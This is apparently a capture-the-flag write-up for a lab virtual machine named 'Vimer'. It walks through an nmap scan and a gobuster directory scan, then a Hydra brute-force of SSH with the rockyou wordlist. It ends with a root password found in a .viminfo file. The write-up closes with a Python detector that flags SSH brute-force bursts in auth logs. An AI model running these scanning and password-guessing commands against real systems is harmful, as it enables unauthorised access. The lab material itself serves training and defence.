1. Information gathering
1.1 Port scan
┌──(kali㉿kali)-[~]
└─$ nmap -p- -A 192.168.1.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:43 EST
Nmap scan report for bogon (192.168.1.11)
Host is up (0.0019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
|_auth-owners: vim
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Vimer
113/tcp open ident?
|_auth-owners: vim
MAC Address: 08:00:27:80:19:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
View port 80

1.2 Directory scan
gobuster dir -u http://192.168.1.11 -w directory-list-2.3-small.txt
Starting gobuster in directory enumeration mode
===============================================================
/vim (Status: 301) [Size: 310] [--> http://192.168.1.11/vim/]
Progress: 87662 / 87662 (100.00%)
===============================================================
Finished
Brute-force the SSH service with Hydra
rockyou.txt is a well-known password wordlist file
hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.1.11 ssh
vim:000001
ssh vim@192.168.1.11
000001
Enter the vim view
View .viminfo
:e ./.viminfo
Found the root password
root:xxxxoooo
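
Seen from the defender's side, the Hydra step above leaves a burst of failed SSH logins from one source followed by a single success. The following is an added example, not part of the original writeup, that flags that pattern in sshd log lines; the sample log, its hostname, addresses and timestamps, and the function name detect_bruteforce are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the traditional syslog format used for sshd messages
# (e.g. /var/log/auth.log). Hostname, addresses, ports and times are made up.
SAMPLE_LOG = "\n".join(
    [f"Dec 21 06:50:{s:02d} target sshd[811]: Failed password for vim "
     f"from 192.168.1.50 port {40100 + s} ssh2" for s in range(1, 7)]
    + ["Dec 21 06:50:09 target sshd[811]: Accepted password for vim from 192.168.1.50 port 40110 ssh2",
       # One typo followed by a normal login: must not raise an alert.
       "Dec 21 07:15:02 target sshd[902]: Failed password for vim from 192.168.1.20 port 51000 ssh2",
       "Dec 21 07:15:08 target sshd[902]: Accepted password for vim from 192.168.1.20 port 51002 ssh2"]
)

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1), year=2025):
    """Flag sources with >= threshold failed logins inside window, and record
    the account if that source later authenticates successfully."""
    failures = defaultdict(list)  # source address -> timestamps of recent failures
    alerts = {}                   # source address -> alert record
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so the caller supplies it.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["src"]
        if m["result"] == "Failed":
            failures[src] = [t for t in failures[src] if ts - t <= window] + [ts]
            if len(failures[src]) >= threshold:
                alert = alerts.setdefault(
                    src, {"src": src, "failures": 0, "compromised_user": None})
                alert["failures"] = max(alert["failures"], len(failures[src]))
        elif src in alerts:
            # A success from a source that already tripped the threshold is the
            # high-priority case: the guessing most likely worked.
            alerts[src]["compromised_user"] = m["user"]
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

An alert with compromised_user set is the one to act on first: lock the account, rotate its password, and review what the session touched.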